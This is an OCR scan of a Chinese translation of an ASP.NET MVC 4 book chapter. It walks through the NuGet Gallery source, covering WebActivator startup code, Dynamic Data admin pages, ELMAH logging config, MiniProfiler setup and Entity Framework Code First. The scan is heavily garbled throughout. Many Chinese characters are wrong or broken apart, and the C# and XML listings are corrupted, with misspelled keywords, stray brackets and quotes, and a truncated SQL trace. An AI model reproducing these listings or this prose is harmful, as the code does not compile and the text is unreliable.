说 明 现 在 在 MVC 4 中 使 用 基于 任务 的 异步 模式 是 多 么 容易 啊 ! 


15.8 ”小结 


本 书 通 篇 都 没有 用 大 量 的 信息 淹没 重要 的 概念 ， 即 便 这 些 信息 是 有 趣 的 ， 同 时 也 尽量 
避免 探讨 未 介绍 的 组 件 之 间 的 交互 ， 尽 管 它们 之 间 的 交互 是 令 人 感 兴趣 的 ， 也 没有 深入 浏 
览 令 笔者 振奋 的 实现 细节 ， 因 为 这 些 细节 可 能 会 阻碍 学 习 者 。 

但 是 ， 本 章 分 享 了 一 些 ASPNET MVC 内 部 工作 原理 和 充分 利用 框架 的 高 级 技术 。 笔 
者 希望 您 能 像 我 们 一 样 喜欢 。 
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ASP.NET MVC 实战 : 
构建 NuGet.org 网 站 


本 章 内 容 简 介 : 
e NuGet Gallery 源码 


® WebActivator 

e ASP.NET 动态 数据 
e 异常 日 志 

e 性 能 分 析 

e 数据 访问 

e 代码 先行 迁移 

e 成 员 资格 

e 其 他 有 用 的 NuGet 包 


要 学 习 诸 如 ASPNET MVC 的 框架 ， 我 们 需要 读书 。 要 学 习 使 用 框架 构建 真实 世界 的 
程序 ， 我 们 就 需要 读 源码 。 真 实 世 界 实现 的 源码 是 一 种 非常 优质 的 资源 ， 可 以 帮助 我 们 学 
习 如 何 利用 从 书本 上 获取 的 知识 以 构建 应 用 程序 。 

术语 “真实 世界 ” 指 的 是 已 经 很 好 地 投入 使 用 并 能 满足 业务 需求 的 应 用 程序 ， 也 可 指 
直观 地 理解 为 现在 我 们 就 可 以 使 用 浏览 器 访问 的 应 用 程序 。 由 于 现实 中 ， 期 限 和 不 断 变 化 
的 需求 ， 使 得 真实 世界 的 应 用 程序 与 在 书本 上 看 到 的 应 用 程序 不 同 ， 书 本 上 的 应 用 程序 感 
觉 颇 有 几 分 做 作 。 
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章 回 顾 了 一 个 完全 使 用 ASPNET MVC 开发 的 真实 世界 应 用 程序 ， 如 果 已 经 认真 学 
习 了 第 10 章 内 容 ， 我 们 可 能 已 经 熟悉 了 这 个 应 用 程序 。 不 错 ， 这 个 应 用 程序 就 是 NuGet 
Gallery。 我 们 可 以 访问 http://nuget.org/， 查 看 它 面 向 公众 的 功能 集 。 目 前 ，ASPNET 和 
ASPNET MVC 团队 仍 积极 参与 其 开发 。 


16.1 源码 与 我 们 同 在 


NuGet Gallery 的 源码 与 运行 的 http://nuget.org/ 网 站 代码 一 样 ， 托管 在 GitHub 上 ， 网 址 
是 https://github.com/nuget/mugetgallery/。 如 果 需 要 把 源码 获取 到 本 地 机 器 上 ， 请 认真 阅读 
页 面 上 README 中 的 说 明 书 。 

这 些 说 明 主要 面 癌 那些 有 一 定 Git 基础 ， 并 打算 为 NuGet Gallery 项 目 做 页 献 的 开发 人 
员 。 如 果 只 是 想 查 看 源码 , 不 打算 使 用 Git, 我 们 也 能 下 载 一 个 zip 文件 : https://github.com/ 
NuGet/NuGetGallery/zipball/master。 

在 本 地 机 器 上 下 载 源码 之 后 ， 要 确保 机 需 安 装 Visual Studio 2010 SP1 和 README 中 
提 到 的 其 他 先决 软件 包 (Azure SDK 和 NuGet)。 运 行 PowerShell 脚本 .\Build-Solution.ps1l， 
验证 开发 环境 是 否 设 置 正确 。 这 个 PowerShell 脚本 构建 解决 方案 , 并 运行 所 有 的 单元 测试 。 
如 果 成 功 ， 说 明 我 们 配置 正确 。 

当 我 们 在 Visual Studio 中 打开 解决 方案 时 ， 会 注意 到 只 有 两 个 项 目 ， 如 图 16-1 所 示 。 

Solution Explorer 
A 
a Solution 'NuGetGallery' (2 projects) 
; Solution ltems 


NuGetGallery.msbuild 
EE README.markdown 


Py Facts 


.二 Website 


图 16-1 


其 中 的 Facts 项 目 包含 项 目的 所 有 单元 测试 。 


注意 ”NuGet Gallery 的 单元 测试 使 用 XUnitNET Framework 一 一 一 个 干 
净 美 观 、 精 心 设计 的 轻 量 框 架 一 一 编写 。 这 里 我 不 只 是 说 XUnitNET 的 作者 
之 一 Brad Wilson 也 是 本 书 的 一 个 作者 。 他 也 是 ASPNET MVC 团队 的 一 员 。 
所 以 ，Brad 非常 繁忙 。 
在 XUnitNET 中 ,测试 被 称 为 facts， 用 FactorAttribute 表示 。 这 也 正 是 将 
单元 测试 项 目 命名 为 Facts 的 原因 。 
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Website 项 目 包 含 ASPNET MVC 项 目 。 现在 我 们 可 
能 会 问 “Models 项 目 在 哪里 ? NuGetGallery.Core 项 目 在 
哪里 ? 这 如 何 能 成 为 一 个 真实 世界 的 应 用 程序 ， 除 非 它 
包含 一 个 bajillion 项 目 ? ” 

许多 ASPNET MVC 应 用 程序 都 是 过 早 地 把 解决 方 
案 分 成 多 个 不 同 的 类 库 。 这 样 的 状况 源 于 ASPNET 早期 
版 本 的 延期 , 在 ASPNET 早期 版 本 中 , 单元 测试 项 目 中 
不 能 引用 网 站 。 人 们 通 贡 创建 一 个 包含 所 有 核心 多 辑 的 
类 库 ， 然 后 从 单元 测试 中 引用 这 个 类 库 。 

这 样 做 忽略 了 一 个 事实 ，ASPNET MVC 项 目 是 一 
个 类 库 ! 在 单元 测试 项 目 中 引用 这 个 项 目 是 可 以 实现 的 ， 
正如 上 和 耐 的 Facts 项 目 。 

但 是 把 一 个 解决 方案 分 解 成 多 个 项 目的 其 他 原因 
是 什么 呢 ， 关 注 点 分 离 ? 在 需求 产生 之 前 ， 把 一 个 解决 
方案 分 割 成 多 个 项 目 不 可 能 会 魔法 般 地 分 离 关 注 点 。 关 
注 点 分 离 关 注 的 是 职责 分 离 ， 而 不 仅 是 把 代码 分 割 到 多 
个 程序 集中 。 

NuGet 团队 知道 项 目的 大 部 分 代码 都 是 针对 这 个 项 
目的 ， 而 不 能 广泛 地 重复 使 用 。 当 编写 的 代码 可 以 广泛 
地 重复 使 用 时 ， 我 们 可 以 把 这 些 代 码 封 装 成 单独 的 


种 应 用 的 一 个 成 功 范例 。 


Solution Explorer 
和 
a UD Website 


Properties 

= References 

bin deployableAssemblies 
a ap 

3) App_Code 

App_ Yart 

上 Commands 
Content 

Controllers 

DD DataServices 

La DynamicData 

[a Entitres 

a Errors 

a Infrastructure 

9 Migrations 

3 PackageCurators 
[a Quenes 

I RequestModels 

[a Seripts 

ermvices 
ViewiMoedels 

Da Vews 

一 _app_offline.htm 
| Constants.cs 

漳 ExtensionMethods.cs 
MM favicon.ico 

i packages.config 

到 RequireRemoteHttpsAttribute.cs 
型 RouteNames.cs 
Strings.resx 

如 TIMYVCtt 

| TAMVC.tt.settings.tH 
| UrlExtensions.cs 

i Web.config 


图 16-2 


展开 Website 项 目 ， 我 们 会 看 到 许多 文件 夹 ， 如 图 16-2 所 示 。 每 个 文件 夹 代表 一 种 不 
同 的 功能 集合 或 功能 类 型 。 例 如 ，Migrations 文件 夹 包含 所 有 的 数据 库 迁 移 ， 本 章 后 面 会 


介绍 这 些 内 容 。 


这 里 有 各 种 各 样 的 功能 ， 但 不 包括 项 目 中 使 用 的 第 三 方 库 。 我 们 可 以 打开 Website 项 
目 根 目 录 下 的 packages.config 以 查看 这 里 使 用 的 所 有 技术 。 在 所 与 这 部 分 内 容 时 ， 项 目 中 
安装 了 33 个 NuGet 包 。 尽 管 这 不 是 使 用 中 分 离 产 品 的 精确 数量 ， 由 于 一 些 产 品 被 分 离 成 
多 个 NuGet 包 ， 但 它 能 够 告诉 我 们 项 目 使 用 了 大 量 的 第 三 方 库 。 介 绍 所 有 这 些 内 容 震 要 一 
本 书 ， 所 以 这 里 笔者 挑选 了 一 些 值得 注意 的 领域 进行 讲解 。 这 些 都 是 真实 世界 应 用 程序 再 


要 处 理 的 问题 ， 但 这 些 问 题 并 不 全 面 。 


16.2 WebActlvator 


许多 第 三 方 库 都 不 只 是 对 一 个 简单 程序 集 


I 引用 。 当 应 用 程序 启动 时 , 这 些 第 三 方 库 有 时 


411 


412 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


方法 中 复制 粘贴 一 些 司 动 代码 。 

WebActivator 是 一 个 NuGet 包 。 当 包 中 包含 带 有 3 引用 程序 集 的 源码 时 ， 它 能 有 效 地 解 
决 这 个 问题 ， 使 得 NuGet 包 添 加 应 用 程序 启动 代码 变 得 简单 。 

如 果 需 要 时 详细 地 了 解 WebActivator, 笔者 推荐 David Ebbo 的 博客 , 网址 是 http://blogs. 
msdn.conmyb/davidebb/archive/2010/10/11/leht-up-your-nupacks-with-startup-codeand-webactivator. 
asSDX。 

NuGet Gallery Website 项 日 包含 一 个 App _ Start 文件 来。 依赖 于 WebActivator 的 启动 代 
码 通 常 就 放 在 这 个 文件 夹 中 。 程 序 清单 16-1 是 一 个 示例 代码 文件 ， 演 示 了 如 何 使 用 
WebActivator 来 运行 启动 及 关闭 代码 。 


程序 清单 16-1: WebActivator 模板 


[assembly: WebActivator.PreApplicationstartMethod l 

typeof (SomeNamespace.AppActijivator), “PTFeStart ) | 
[lassembly: WebactlIvator .PostApPLIcat1lIonstartMethod 

typeof (SomeNamespace .AppActivator), "PostStar 廿 ) 
[assembly: WebActivator.ApplicationshutdownMethodAttributel( 

typeof (SomeNamespace.AppActivator), "Stop")]| 


namespace SomeNamespace 


{ 
public static class AppActivator 
{ 
public static void PreStart {() 
{ 
// Code that runs before Application Start. 
} 
public static void Poststart () 
{ 
// Code that runs after Application Start. 
} 
Public static void Stop (|) 
{ 
// Code that runs when the application is shutting down. 
} 
} 
} 


Website 项 目 文 件 中 的 AppActivator.cs 包含 局 动 代 人 码 , 这 些 启动 代码 配置 了 许多 NuGet 
Gallery 依赖 的 服务 ， 比 如 性 能 分 析 (profiling)、 和 迁移、 后 台 任 务 和 我 们 搜索 的 索引 
(LuceneNET)。 上 面 是 一 个 很 好 的 示例 ， 演 示 了 如 何 使 用 WebActivator 在 代码 中 配置 启动 
服务 。 
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16.3 ASP.NET 动态 数据 


ASPNET 动态 数据 是 一 个 经 痢 被 ASPNET MVC 开发 人 员 忽 略 的 特征 ， 因 为 它 是 一 个 
Web Forms 特征 。 事 实 上 ，ASPNET 动态 数据 建立 在 Web Forms 基础 之 上 ,但 它 只 是 一 个 
实现 细节 。ASPNET MVC 和 Web Forms 都 是 ASPNET 应 用 程序 ， 在 开发 生产 中 ， 它 们 可 
以 混合 使 用 。 

对 于 NuGet Gallery， 我 们 使 用 动态 数据 作为 一 种 快速 方法 来 构建 基 架 管理 界面 ， 这 样 
就 可 以 通过 浏览 器 编辑 数据 库 中 的 数据 。 最 后 ， 我 们 希望 构建 一 个 合适 的 管理 节 来 管理 库 
(gallery)， 动 态 数据 在 关键 部 分 起 了 很 大 作用 。 因 为 这 是 一 个 管理 页 面 ， 所 以 用 户 界 面 细节 
对 我 们 来 说 并 不 重要 ， 尽 管 动态 数据 肯定 是 可 以 自 定 义 的 ， 如 果 我 们 想 建 立 一 个 友好 的 用 
户 界面 的 话 。 

如 果 需 要 在 实际 应 用 中 查看 动态 数据 ,我们 需要 确保 把 Website 项 目 设置 为 启动 项 目 ， 
然后 按 Ctrl+FS 组 合 键 在 浏览 器 中 启动 项 目 。 在 URL 后 面 添加 /dbadmin 以 访问 数据 库 管理 
页 面 。 由 于 我 们 是 在 本 地 主机 上 运行 网 站 ， 因 此 我 们 的 用 户 账户 不 需要 是 管理 员 身 份 ， 只 
需 进 行 身 份 验证 。 所 以 ， 我 们 首先 注册 一 个 账户 ， 然 后 再 访问 /dbadmin。 当 远程 访问 时 ， 
/dbadmin 节 就 需要 我 们 的 账户 拥有 管理 员 权限 。 

成 功 访问 后 ,我 们 会 看 到 数据 库 中 表 的 一 个 列表 ， 如 图 16-3 所 示 。 从 技术 角度 看 ， 并 
非 每 一 个 表 都 会 列 出 ， 只 是 列 出 了 那些 对 应 Entity Framework 实体 的 表 。 


I 因 Dynamic Data Site \ 
te 3 CC localhost5880/dbadmir 看 的 本 a | 
| 
DYNANMIC DATA SITE .| 


€ Hark re 


My tables 


Table Name 


图 16-3 
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当 在 本 地 开发 时 ， 确 保单 击 Users。 如 果 刚 开始 ， 我 们 应 该 是 数据 库 中 唯一 的 用 户 ; 
否则 我 们 需要 通过 e-mail 地 址 查询 目 己 的 账户 。 找 到 用 户 账户 后 ， 选 中 标签 为 Admins 的 
Roles 复 选 杠 ， 如 图 16-4 所 示 ， 然 后 单 击 Update 来 保存 更 新 。 当 后 面 介绍 ELMAH 时 ,我 
们 需要 这 一 操作 。 


! | 四 Users x 


C 


Emailallowed 


EmailCconfirmationToKen 


passwordResetToken 


PasswordResetTolkenExpiratronDabte 


Messages 


图 16-4 


辣 已 有 的 ASPNET MVC 应 用 程序 添加 动态 数据 ， 震 要 采取 一 些 步 又 。 笔 者 已 经 激励 
ASPNET 团队 编写 NuGet 包 实 现 。 但 现在 我 们 需要 执行 以 下 操作 : 

(1) 创建 一 个 ASPNET Dynamic Data Entities Web Application 项 目 ,我 们 不 需要 对 这 个 
项 目 做 太 多 工作 ， 只 需要 移 除 一 些 文件 。 

(2) 把 上 面 创 建 的 项 目 中 的 DynamicData 文件 夹 复制 到 我 们 的 ASPNET MVC 项 目 。 

(G3) 将 Dynamic Data 项 目 根 目录 下 的 以 下 文件 复制 到 我 们 ASPNET MVC 项 目的 
DynamicData 文件 夹 中 : 

® Default.aspx 和 Default.aspx.cs 

® Site.master 和 Site.master.cs 

@ Slite.css 

® Web.config 

(4) 修改 所 有 文件 引用 : 

(a) 在 Site.master 中 ， 把 link 标记 的 href 的 值 ~/site.css 改 为 site.css。 这 样 可 以 确保 
Dynamic Data 模板 使 用 的 是 DynamicData 文件 夹 中 的 site.css。 
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(b) 在 Site.master 中 ， 把 锚 标 记 的 href 值 ~/ 修 改 为 ~/dbadmin， 或 者 其 他 任何 我 们 打算 
提供 Dynamic Data 管理 服务 的 位 置 。 

(c) 修改 DynamicData\PageTemplates 文件 夹 中 的 每 个 页 面 ， 把 这 些 页 面 中 的 MasterPageFile 
指令 值 ~/Site.master 修改 为 Site.master。 这 样 可 以 确保 Dynamic Data 模板 使 用 DynamicData 
文件 夹 中 的 母 版 页 。 

(5) 使 用 NuGet 安装 DynamicData.EFCodeFirstProvider 包 。 这 样 就 把 相应 的 引用 添加 
到 System.Web.DynamicData 程序 集中 。 

(6) 注册 动态 数据 模型 提供 器 、 实 体 框架 上 下 文 和 路 由 。 程 序 清单 16-2 演示 了 注册 启 
用 动态 数据 代码 的 示例 。 这 些 代 码 来 自 NuGet Gallery 中 的 Register.cs 类 。 


程序 清单 16-2: 动态 数据 注册 


USing System.Web.DynamicData; 
USing SySstem.Web.Routing; 
Using DynamicData .EFCodeFirstProvider; 


Uslng NuGetGallery; 


namespace DynamicDataEFCodeFirst 
{ 
public class Registration 
{ 
private static readonly MetaModel defaultModel = 
new MetaModel (})}; 
public static MetaModel DefaultModel 


{ 
get 
L 
return defaultModel; 
} 
} 


public static Vold Register(RouteCollection routes) 
{ 
DefaultModel .RegisterContext( 
new EFCodeFirstDataModelProvider!l 
() => new EntitiesContext(})}), 
new ContextConfiguration() 
{ ScaffoldAllTables = true });} 


// This route must come first to prevent some other route 
// from the site to take over 
routes.Insert (0, new 

DynamicDataRoute ("dbadmin/{table}/{action}") 
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Constraints = new RouteValueDictionary (new 
{ action = "List|lDetails|Edit|Insert™ }), 
Model = DefaultModel 
}); 


routes .MapPageRoute( 
"dd default", 
"dbadmin™, 
"~/DynamicData/Default .aspx"); 


} 


当 启 动 应 用 程序 时 ， 确 保 调 用 了 Register 方法 。AppActivator.cs 代码 为 NuGet Gallery 
调用 了 此 方法 。 
当 笔 者 编写 这 些 内 容 时 ，David Ebbo 正在 编写 实现 目 动 化 这 些 步骤 的 NuGet 包 ， 请 


16.4 异 营 日 志 


当 创 建 Web 应 用 程序 时 ，ELMAH 是 笔者 推荐 安装 的 第 一 个 包 。NuGet 首次 发 布 时 ， 
笔者 做 的 每 次 NuGet 演讲 (以 及 几乎 所 有 关于 NuGet 的 其 他 演示 文稿 ) 都 有 一 个 安装 
ELMAH 包 的 示范 。ELMAH 是 错误 日 志 记 录 模 块 和 处 理 程序 (Error Logging Module and 
Handle?r) 的 英文 首 邹 母 缩写 。 它 能 够 记录 应 用 程序 中 出 现 的 所 有 未 处理 异常 ， 并 在 日 志 中 
保存 这 些 未 人 处理 异 常 。 此 外 ，ELMAH 还 提供 了 用 户 界 面 ， 并 以 简明 的 格式 列举 日 志 中 的 
错误 ， 维 护 我 们 在 可 怕 的 黄 屏 错误 (Yellow Screen of Death) 上 看 到 的 详细 信息 。 

为 保持 简单， 大 部 分 的 ELMAH 示例 部 是 演示 安装 主要 的 elmah 包 。elmah 包 中 包含 
丁 一些 确保 ELMAH 使 用 内 存 数据 库 运 行 的 配置 ， 同 时 它 还 依赖 于 elmah.corelibrary 包 。 

只 安装 elmah 包 对 于 演示 程序 来 说 足够 了 ， 但 在 真实 网 站 中 这 些 是 远 远 不 够 的 ， 因 为 
这 样 只 是 使 得 异常 日 志 存 储 在 了 内 存 中 ， 如 果 应 用 程序 重新 启动 ， 日 志 就 会 消失 。 鱼 运 的 
是 ，ELMAH 包含 了 针对 大 多 数 主要 数据 库 钱 商 的 包 ， 此 外 ， 还 包含 了 一 个 把 日 志 存 储 在 
XML 文件 中 的 包 。 

由 于 NuGet Gallery 使 用 SQL Server 作为 数据 库 ， 因 此 我 们 需要 安装 elmah.sqlserver 
包 ， 注 意 在 安装 过 程 中 一 些 配置 瑚 要 手动 设置 。 当 把 elmah.sqlserver 包 安 装 到 我 们 的 项 目 
中 时 ， 会 看 到 项 目的 App_Readme 文件 夹 下 添加 了 一 个 Elmah.SqlServer.sql 脚本 。 我 们 需 
要 对 SQL Server 数据 库 执 行 这 个 脚本 ， 以 便 创 建 ELMAH 需要 的 表 和 存储 过 程 。 

对 于 NuGet Gallery， 我 们 会 删除 App_Readme 文件 夹 ， 但 我 们 可 以 在 项 目 相 对 于 解决 
方案 根 目录 的 路 径 packages\elmah.sqlserver.1.2\content\App Readme 中 找到 Elmah.SqlServersql 
脚本 。 
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默认 情况 下 ， 只 能 从 本 地 主机 访问 ELMAH。 这 是 一 个 重要 的 安全 预防 措施 ， 因 为 访 
问 ELMAH 日 志 的 任何 人 都 可 能 支持 我 们 任意 用 户 的 会 话 。 如 果 想 了 解 详情 ， 请 参阅 博客 
文章 : Www.troyhunt.conmy/2012/01/aspnet-session-hijackine-with-google.html。 

远程 访问 异常 日 志 可 能 是 我 们 首选 ELMAH 的 一 个 原因 。 不 必 担 心 ， 实 现 远 程 访问 只 
需要 一 些 简 单 的 配置 。 首 先 ， 应 该 访问 的 用 户 或 角色 可 以 安全 访问 elmah.axd。 

NuGet Gallery 的 web.config 文件 中 有 这 样 的 一 个 例子 。 我 们 只 限制 Admins 角色 成 员 
能 够 访问 。 


<location path="elmah.axd"> 
<SVYStem .Web> 
<httpHandlers> 
<add verb="POST,GET, HEAD” path="elmah .axd™ 
type="Elmah .ErrorLogPageFactory, Elmah™ /> 
</httpHandlers> 
<authorization> 
<allow roles="Admins™" /> 
<deny users="*™ /> 
</authorization> 
</system.web> 
<system.webServer> 
<handlers> 
<add name="Elmah™" path="elmah.axd"” verb="POST,GET,HEAD" 
type="Elmah .ErrorLogPageFactory, Elmah™ 
preCondition="integratedMode™ /> 
</handlers> 
</system.webServer> 
</location> 


安全 访问 elmah.axd 后 ， 把 security 元 素 的 allowRemoteAccess 特性 修改 为 tue， 局 动 
远程 访问 。 
<Security allowRemoteAccess="true"> 


现在 可 以 访问 网 站 的 /elmah.axd， 查 看 未 处 理 的 异常 。 如 果 仍 然 不 能 访问 elmah.axd， 
请 确保 使 用 Dynamic Data 数据 库 管理 界面 为 账户 添加 Admins 角色 ， 如 下 一 节 所 述 。 


16.5 ”性 能 分 析 
笔者 推荐 开发 人 员 加 ASPNET MVC 应 用 程序 安装 的 第 二 个 包 是 MiniProfiler(http://mini- 


profilercom/) 包 集 。 安 装 并 正确 配置 之 后 ， 当 应 用 程序 在 本 地 主机 运行 时 ，MiniProfiler 会 
问 网 站 的 每 个 页 面 添加 一 个 小 部 件 (widgeb。 我 们 会 在 页 面 的 左上 角 看 到 ， 如 图 16-5 所 示 。 
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J 天 NuGet Gallery 


@ © localhost55880 


® 


Home Packages Upload Package Documentation 


Jump Start Your Projects with NuGet 
NuGet Is a Visual Studio extension that makes 
it easy to Install and update third-party 
libraries and tools In Visual Studio. 


图 16-5 
单 击 小 部 件 ， 我 们 就 会 得 到 当前 页 面 的 性 能 解析 信息 。 例如， 图 16-6 展示 搜索 NuGet 


Gallery 的 页 面 运行 了 两 个 SQL 僵 询 。 我 们 也 可 以 看 到 但 询 的 时 间 信 息 ， 以 及 请 求生 命 周 
期 中 某 个 键 点 的 时 间 信 息 ， 比 如 泻 染 视 图 和 部 分 视图 。 


: 了 国 NuGet Gallery 


所 (> © localhost55880/packages?q=jQuery 


Packages/ListPackages HAACKITUDE on Sat. 28 Apr 2012 00-25:30 GMT 


httpiMocalhostss880/pachages 交加 三 JU 二 站 了 ,日 :网 : 

Controller. PackagesController.ListPackages 11i3,8 4 1 sql 9.2 
Querying and mapping packages to list 54 ,4 15.9 1 sql 23.5 
Render partial: ~\iews/Packages/! ListPack 和 4.7 +171.9 


show time wih chiiren 


Response 8.8 +181.0 
| Dom Complete -238.0 


| Es | Sho trial 


图 16-6 


使 用 Entity Framework 和 ORM 的 代码 要 精确 了 解数 据 库 生成 和 运行 的 SQL 是非 第 困 
难 的 。 然 而 ，MiniProfiler 可 以 轻松 地 呈现 这 些 信 息 。 我 们 只 需 单 击 “sql” 链 接 ， 就 可 以 碍 
看 生成 的 SQL 和 包含 的 方法 ， 如 图 16-7 所 示 。 

为 使 用 Entity Framework 的 ASPNET MVC 应 用 程序 设置 MiniProfiler， 需 要 安装 
MiniProfiler、MiniProfiler.EF 和 MiniProfiler MVC。 安装 完成 这 些 包 后 ， 还 需要 设置 一 些 配 
置 。 我们 可 以 在 AppActivator.cs 文件 中 查看 NuGet Gallery 的 配置 。 大 部 分 配置 都 在 MiniPro- 
filerPreStart 和 MiniProfilerPostStart 方法 中 ， 也 有 部 分 在 私有 的 MiniProfilerStartupModule 
HTTP 模块 类 中 。 


418 


第 16 章 ASPNET MVC 实战 : 构建 NuGet.org 网 站 


106.60 ms Controller PackagesConiroller LisiPackages — 104.20 ms 


Controller Get ExwecuteStartImpl StackExchange.Profliline.Data.l10bProfliler.Executes 
rListPackages 
186.6 SELECT 


Reader Cr [Al1Y AS [C1] 
9.2 COUNT(1) AS [A1] 
FROM [dbo]. [Packages] AS [Extentl1] 
WHERE en [IsLateststable] = 1) OR (([Extent1].[IsLate 
AS [C1 


FRO+ Ee [Packages] AS [Extent2] 
E ([Extenti]. 下 画 [Extent2]. 
4 AND (CLExtentI’ [Listed] = 1) OR ( EXISTS (SELECT 
5 [Cl1] 
PAON [db0].[PackageRegistrationQmmers] AS [Extent3] 
INNER JOIN [db6].[Users] AS [Extentd4] ON [Extent3]. [Us 
WHERE ([Extent1].[PackageRegistrationKey] = [Extent3]. 
))) AND (1 = [Extent1].[Key]) 
) AS [GroeupByi] 


到 ”16-7 


先 分 析 第 一 个 方法 : 


private static void MiniprofilerPprestart () 


{ 
MiniPprofilerEF.TInitialize()}); 
DynamicModuleUtility.ReglisterModule (typeof (MiniProfilerstartupModule})); 
GlobalFilters.Filters.Add (new ProfilingActionFilter()); 

} 


这 个 方法 的 第 一 行 代码 为 Entity Framework Code First 设置 MiniProfiler。 如 果 没 有 使 
用 Code First， 或 者 没有 使 用 Entity Framework， 我 们 需要 阅读 MiniProfiler 文档 ， 为 使 用 
的 框架 配置 记录 SQL 碍 询 。 

第 二 行 代 码 注 册 目 定义 的 HITP Module MiniProfilerStartupModule。 在 ASPNET 4 
之 前 的 版 本 中 , 注册 HTTP 模块 的 仪 有 方式 是 同 Web.config.MiniProfilerStartupModule 控件 
中 添加 一 些 配置 ， 0 能 解析 的 局 动 时 间 和 执行 方式 。 编 写 这 些 内 容 时 ， 当 通 
过 本 地 主机 访问 性 能 解析 时 ， 它 只 能 解析 应 用 程序 。 人 然而， 事实 上 有 一 些 管理 权限 代码 ， 

日 是 现在 这 里 注释 挥 了 。 这 里 的 1 t 码 与 MiniProfiler 文档 建议 在 Application BeginRequest 
和 Application EndRequest 方法 中 编写 的 代码 相似。 
最 后 一 行 代 码 添加 了 一 个 用 来 在 ASPNET MVC 应 用 程序 中 解析 操作 的 全 局 过 滤器 。 
接 下 来 看 第 二 个 方法 : 


private static void MiniprofilerPostsSstart () 


{ 
Var CopPY = ViewEngines.Engines.ToList (); 
ViewEngines.Engines.Clear ()，; 
foreach (var item in copy) 
ViewEngines .Engines.Add (new ProfilingViewEngine (litem) ); 
} 


这 个 方法 用 一 个 性 能 解析 视图 引擎 打包 应 用 程序 中 的 所 有 视图 引擎 。 这 样 MiniProfiler 
就 可 以 提供 详细 信息 ， 以 便 我 们 知道 泻 染 视图 和 部 分 视图 耗费 的 时 间 。 
使 用 这 些 配置 ，MiniProfiler 可 以 解析 许多 应 用 程序 信息 。 尽 管 MiniProfiler 不 会 解析 
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每 个 方法 调用 ， 因 为 这 样 会 很 侵入 ， 但 它 仍然 能 够 为 我 们 提供 大 量 的 信息 。 可 能 在 某 些 情 
况 下 ， 我 们 需要 更 多 信息 。 例 如 ， 茶 个 代码 路 径 非 常 热 ， 我 们 想 看 它 在 生产 中 花费 多 长 时 
间 。 此 时 ，MiniProfiler 为 我 们 提供 一 个 API， 可 以 用 来 以 任意 选择 的 粒度 解析 代码 。 

MiniProfiler 不 是 所 有 的 代 但 分 析 和 性 能 测量 工具 的 替代 品 。 然 而 事实 上 , 它 是 免费 的 ， 
只 需 花 费 几 分 钟 时 间 来 安 阔 和 配置 ， 它 的 用 户 实 验 容 易 使 用 、 容 易 理 解 。 在 应 用 程序 的 
NuGet 包 列 表 中 使 用 MiniProfiler 的 开发 人 员 占 很 高 一 部 分 比例 , 这 证 明了 笔者 的 推荐 是 下 
确 的 。 


16.6 ”数据 访问 


NuGet Gallery 使 用 “Code First” 方 法 , 同时 , Entity Framework 4.3.1 依赖 于 SQL Server 
2008 数据 库 运 行 。 当 在 本 地 运行 代码 时 ,代码 会 依赖 于 一 个 SQL Server Express 实例 运行 。 

Code First 基于 大 量 的 约定 ， 默认 情况 下 需要 的 配置 极 少 。 当 然 ， 开发 人 员 往 往 倾 同 于 
根据 上 自己 的 个 人 偏好 目 定义 接触 到 的 每 项 设置 ，NuGet 团队 也 是 如 此 。 存 在 一 些 约定 ， 我 
们 可 以 用 目 定 义 的 配置 来 奉 换 。 

EntitiesContext 类 包含 我 们 对 Entity Framework Code First 目 定义 的 配置 。 例 如 ， 下 面 
的 代码 片段 把 Key 属性 配置 成 为 User 类 型 的 主键 。 如 果 属 性 名 称 是 lH， 或 者 Key 属性 应 
用 了 KeyAttribute， 这 行 代 码 就 不 需要 了 。 


modelBuilder.Entity<User>() .HasKey(u => u.Key); 


这 个 约定 的 一 个 异常 是 WorkItem 类 ， 因 为 它 来 自 于 男 一 个 类 库 。 

所 有 的 Code First 实体 类 都 放 在 Entities 文件 夹 中 。 每 个 实体 都 实现 了 IEntity 接口 。 
接口 中 包含 单个 属性 

NuGet Gallery 不 能 从 DbContext 派生 类 中 直接 访问 数据 库 。 但 是 所 有 数据 都 可 以 通过 
IEntityRepository<T> 接 口 访问 。 


key。 


public interface IEntityRepository<T> Where T : class, IEntity, new'() 


{ 
void CommitChanges (); 
VOIld DeleteOnCommit (T entity}; 
T Get(int Kev) ; 
IQueryable<T> GetAll (); 
int InsertOnCommit (T entity).; 
} 


这 个 接口 实现 使 得 服务 的 单元 测试 编写 变 得 极其 简单 。 例 如 ，UserService 类 的 一 个 构 
造 图 数 参 数 是 IEntityRepository<User> 。 在 单元 测试 中 , 我 们 可 以 简单 地 传递 一 个 该 接口 的 
模拟 实现 。 

但 在 现实 应 用 程序 中 ， 我 们 会 传递 一 个 具体 的 EntityRepository<User>。 这 些 我 们 可 以 
通过 使 用 Ninject 的 依赖 注入 (本 章 后 面 会 介绍 ) 来 实现 。 所 有 Ninject 构建 都 放 在 Container- 
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Bindings 类 中 。 
16.7 EF 基于 代码 迁移 


在 应 用 程序 中 ， 改变 共 至 数据 库 模式 是 一 个 极 大 挑战 。 在 过 去 ,我 们 会 编写 SQL 改变 
脚本 ， 并 把 编写 的 这 些 脚本 签 入 代码 ， 然 后 告诉 每 个 人 他 们 需要 运行 的 脚本 。 此 外 ， 我 们 
还 需要 大 量 的 夭 记 来 记录 ， 当 部 署 应 用 程序 的 下 一 个 版 本 时 ， 需 要 基于 生产 数据 库 运行 的 
脚本 。 

EF 基于 代码 迁移 (EF Code-Based Migrations) 是 一 个 代码 驱动 的 、 更 改 数据 库 的 结构 化 
方式 ， 包 含 在 Entity Framework 4.3 及 其 后 续 版 本 中 。 

虽然 这 里 没有 涵 新 迁移 的 所 有 详细 内 容 ， 但 会 介绍 我 们 利用 的 儿 种 迁移 方式 。 展 开 
Migrations 文件 夹 会 看 到 NuGet Gallery 中 包含 的 迁移 列表 ,如 图 16-8 所 示 。 迁移 的 名 称 有 
一 个 时 间 惟 前 级 ， 这 样 可 以 确保 他 们 按照 顺序 执行 。 

Solution Explorer 
总 | 台 固 | 日 及 | 前 | 3 13 
a | Migrations 

| 201110060711357 _Jnitial.cs 
划 201110102157002_PrereleaseChanges.cs 
者 | 201110180052097_GallerySettings.cs 
划 201110230649210_PackageOwnerRequests,cs 
划 201111022024584_PackageDependencyVersionSpec,cs 
| 201111022051010 PackageReleaseNotes.cs 
浊 201111080239544_ListPackagesindexes.cs 
#8] 201111080816426_DisplayPackagelndexes,cs 
| 201111081908453_MyPackagesIndexes.cs 
划 201111150729167_AddSmtpPassword.cs 
划 201111222338036_GalleryOwnerEmailSettings,cs 
